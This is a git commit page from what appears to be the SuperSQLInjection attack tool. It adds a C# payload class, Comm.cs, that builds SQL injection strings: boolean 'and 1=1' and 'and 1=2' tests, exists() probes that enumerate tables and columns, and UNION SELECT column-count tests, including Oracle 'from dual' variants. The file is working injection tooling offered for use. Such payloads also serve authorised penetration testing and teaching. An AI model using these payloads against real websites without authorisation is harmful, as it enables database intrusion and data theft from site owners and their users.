shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

添加项目文件。

Browse Source
This commit is contained in:
shack2
2017-03-13 16:12:15 +08:00
parent c09274e2a8
commit a0a931969c
77 changed files with 18658 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

69
SuperSQLInjection/payload/Comm.cs Normal file
View File

@@ -0,0 +1,69 @@
using System;
using System.Collections.Generic;
using System.Text;
namespace SuperSQLInjection.payload
{
class Comm
{
public static String exists_table = " and exists(select 1 from {0})";
public static String exists_column = " and exists(select {0} from {1})";
public static String truePayload = " and 1=1";
public static String falsePayload = " and 1=2";
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append(column + unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String unionColumnCountTest(int maxColumn,int fill)
{
StringBuilder sb = new StringBuilder(" and 1=2 union all select ");
for (int i = 1; i <= maxColumn;i++ )
{
sb.Append(fill+"+"+i+",");
}
sb.Remove(sb.Length - 1, 1);
return sb.ToString();
}
public static String unionColumnCountTestByOracle(int maxColumn, String fill)
{
StringBuilder sb = new StringBuilder(" and 1=2 union all select ");
for (int i = 1; i <= maxColumn; i++)
{
sb.Append(fill + ",");
}
sb.Remove(sb.Length - 1, 1);
return sb.ToString()+" from dual";
}
public static String unionColumnCountTestByOracle(int maxColumn,int testIndex,String fill)
{
StringBuilder sb = new StringBuilder(" and 1=2 union all select ");
for (int i = 1; i <= maxColumn; i++)
{
if (i == testIndex)
{
sb.Append(fill + ",");
}
else
{
sb.Append("null" + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return sb.ToString() + " from dual";
}
}
}